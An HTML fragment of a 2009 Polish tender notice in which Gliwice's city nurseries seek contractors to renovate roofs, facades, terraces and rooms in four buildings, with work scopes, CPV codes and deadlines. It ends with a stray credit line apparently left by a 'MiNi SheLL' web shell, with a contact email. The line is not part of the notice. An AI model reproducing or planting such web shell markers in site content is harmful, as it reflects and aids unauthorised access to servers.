2.3. Wykaz podwykonawców którzy będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat zakresu wykonywanych przez nich czynności na załączniku Nr 6 do SIWZ. (jeśli dotyczy)
2.4. Podpisany kosztorys ofertowy szczegółowy.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.gliwice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Żłobki Miejskie, 44-121 Gliwice, ul. Kozielska 71.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2009 godzina 11:00, miejsce: Żłobki Miejskie, 44-121 Gliwice, ul. Kozielska 71.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1: 
Roboty remontowo-budowlane budynku Oddziału I Żłobków Miejskich  w Gliwicach ul.  Berbeckiego 10: Remont częściowy dachu, renowacja elewacji budynku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1: 
Roboty remontowo-budowlane budynku Oddziału I Żłobków Miejskich  w Gliwicach ul.  Berbeckiego 10: Remont częściowy dachu, renowacja elewacji budynku

Przedmiot robót remontowo-budowlanych: Remont częściowy dachu, renowacja elewacji budynku
Zakres prac:
 - wyregulowanie rynien i rur spustowych 
 - wymiana obróbek blacharskich
 - montaż płotków śniegowych w kolorze dachówki
 - renowacja elewacji - prace malarskie - powierzchnia 517,788 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.51.08-8, 45.45.53.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2: 
Roboty remontowo-budowlane budynku Oddziału II Żłobków Miejskich  w Gliwicach ul.  Mewy 34: 1) Remont kompleksowy dachu części parterowej łącznie z kominami ponad dachem.2) Remont pomieszczeń żłobka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2: 
Roboty remontowo-budowlane budynku Oddziału II Żłobków Miejskich  w Gliwicach ul.  Mewy 34: 1) Remont kompleksowy dachu części parterowej łącznie z kominami ponad dachem.                 2) Remont pomieszczeń żłobka
Przedmiot robót remontowo-budowlanych: 1) Remont kompleksowy dachu części parterowej łącznie z kominami ponad dachem
Zakres prac:
 - kompleksowy remont pokrycia papowego: rozebranie istniejącego pokrycia,  ułożenie dwóch warstw papy termozgrzewalnej, obróbki z papy termozgrzewalnej  - powierzchnia  dachu 351,563  m2
 - wymiana obróbek blacharskich - powierzchnia  23,438 m2
 -wymiana instalacji odgromowej 
- przemurowanie kominów ponad dachem


Przedmiot robót remontowo-budowlanych:  2) Remont pomieszczeń żłobka
Zakres prac:
 - roboty malarskie, posadzkowe, okładzinowe, wymiana drzwi  w 2 pomieszczeniach żłobka.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.51.08-8, 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3: 
Roboty remontowo-budowlane budynku Oddziału III Żłobków Miejskich  w Gliwicach ul.  Żeromskiego 26a: Remont tarasu grupy IV łącznie z robotami towarzyszącymi.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3: 
Roboty remontowo-budowlane budynku Oddziału III Żłobków Miejskich  w Gliwicach ul.  Żeromskiego 26a: Remont tarasu grupy IV łącznie z robotami towarzyszącymi

Przedmiot robót remontowo-budowlanych: Remont tarasu grupy IV łącznie z robotami towarzyszącymi
Zakres prac:
 - wymiana balustrady tarasowej - balustrada wysokości 1,15 m i długości 20,86 m
 - wymiana posadzki tarasu wraz z warstwami podkładowymi i izolacją, wymiana: rynien, rur spustowych, obróbek blacharskich - powierzchnia  tarasu 40,306 m2
 - wykonanie robót towarzyszących - ujednolicenie elewacji, roboty malarskie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.51.08-8, 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4: 
Roboty remontowo-budowlane budynku Oddziału IV Żłobków Miejskich  w Gliwicach ul.  Kozielska 71: 1) Remont posadzki balkonu i balustrad balkonu na piętrze oraz remont stopni schodów zejścia do ogrodu. 2) Remont tarasu do werandowania.   3) Roboty remontowe dachu części wysokiej wraz z remontem pomieszczeń po zalaniu.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4: 
Roboty remontowo-budowlane budynku Oddziału IV Żłobków Miejskich  w Gliwicach ul.  Kozielska 71: 1) Remont posadzki balkonu i balustrad balkonu na piętrze oraz remont stopni schodów zejścia do ogrodu. 2) Remont tarasu do werandowania.   3) Roboty remontowe dachu części wysokiej wraz z remontem pomieszczeń po zalaniu

Przedmiot robót remontowo-budowlanych: 1) Remont posadzki balkonu i balustrad balkonu na piętrze oraz remont stopni schodów zejścia do ogrodu
Zakres prac:
 - wymiana desek balustrad balkonu i schodów,  malowanie balustrad - balustrada wysokości 1,1 m i długości 37,35 m
 - wymiana posadzki balkonu - powierzchnia  16,52 m2
 - wymiana okładzin stopni i podestu schodów, malowanie konstrukcji schodów - powierzchnia   31,96 m2

Przedmiot robót remontowo-budowlanych: 2) Remont tarasu do werandowania
Zakres prac:
 - wymiana posadzki tarasu - powierzchnia  231,381 m2
 - wymiana okładzin murków tarasu - powierzchnia  67,124 m2
 - wymiana opaski wzdłuż murków tarasu - powierzchnia   17,42 m2

Przedmiot robót remontowo-budowlanych: 3) Roboty remontowe dachu części wysokiej wraz z remontem pomieszczeń po zalaniu
Zakres prac:
 - renowacja pokrycia papowego ułożenie jednej warstwy papy termozgrzewalnej, obróbki z papy termozgrzewalnej  - powierzchnia  dachu 353,44  m2
 - wymiana obróbek blacharskich - powierzchnia  30,08 m2
 - roboty malarskie i posadzkowe w 6 pomieszczeniach żłobka.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.51.00-8, 45.45.30.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com